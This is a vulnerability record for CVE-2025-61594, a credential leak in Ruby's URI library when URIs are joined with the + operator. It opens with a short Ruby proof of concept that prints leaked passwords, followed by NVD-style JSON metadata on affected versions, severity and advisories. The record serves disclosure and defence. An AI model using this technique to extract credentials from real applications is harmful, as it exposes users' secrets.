CVE-2025-61594

require 'uri' # Create a URI with credentials original_uri = URI('http://user:[email protected]/path') # Another URI to combine with another_uri = URI('/another/path') # Using + operator to combine URIs - this leaks the password combined_uri = original_uri + another_uri # The password 'secretpassword' is leaked in the combined URI puts "Original URI: #{original_uri}" puts "Combined URI: #{combined_uri}" puts "Password leaked: #{combined_uri.userinfo}" # Demonstrating the bypass of CVE-2025-27221 fix # The fix for CVE-2025-27221 may have addressed specific cases # but the + operator still exposes credentials # Example showing credential exposure malicious_uri = URI('http://admin:[email protected]/api') + URI('/public/endpoint') puts "Malicious URI with leaked credentials: #{malicious_uri}" # Output will contain 'admin:admin123'

{"cve": {"id": "CVE-2025-61594", "sourceIdentifier": "[email protected]", "published": "2025-12-30T21:15:43.893", "lastModified": "2026-04-16T18:16:44.400", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "URI is a module providing classes to handle Uniform Resource Identifiers. In versions 0.12.4 and earlier (bundled in Ruby 3.2 series) 0.13.2 and earlier (bundled in Ruby 3.3 series), 1.0.3 and earlier (bundled in Ruby 3.4 series), when using the + operator to combine URIs, sensitive information like passwords from the original URI can be leaked, violating RFC3986 and making applications vulnerable to credential exposure. This is a a bypass for the fix to CVE-2025-27221 that can expose user credentials. This issue has been fixed in versions 0.12.5, 0.13.3 and 1.0.4."}, {"lang": "es", "value": "URI es un módulo que proporciona clases para manejar Identificadores Uniformes de Recursos. En versiones anteriores a 0.12.5, 0.13.3 y 1.0.4, existe un bypass para la corrección de CVE-2025-27221 que puede exponer credenciales de usuario. Al usar el operador '+' para combinar URIs, información sensible como contraseñas del URI original puede filtrarse, violando RFC3986 y haciendo que las aplicaciones sean vulnerables a la exposición de credenciales. Las versiones 0.12.5, 0.13.3 y 1.0.4 corrigen el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-212"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:uri:*:*:*:*:*:ruby:*:*", "versionEndExcluding": "0.12.5", "matchCriteriaId": "488EF0F7-7510-451A-9EFC-85673ADC364D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:uri:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "0.13.0", "versionEndExcluding": "0.13.3", "matchCriteriaId": "336CB58A-5975-4516-86A6-FAC69551C4A3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ruby-lang:uri:*:*:*:*:*:ruby:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.0.4", "matchCriteriaId": "7930C9E3-5EEA-40F9-8299-25B6C681BAD6"}]}]}], "references": [{"url": "https://github.com/advisories/GHSA-22h5-pq3x-2gf2", "source": "[email protected]"}, {"url": "https://github.com/ruby/uri/security/advisories/GHSA-j4pr-3wm6-xx2r", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/2957667", "source": "[email protected]"}, {"url": "https://www.ruby-lang.org/en/news/2025/02/26/security-advisories", "source": "[email protected]"}]}}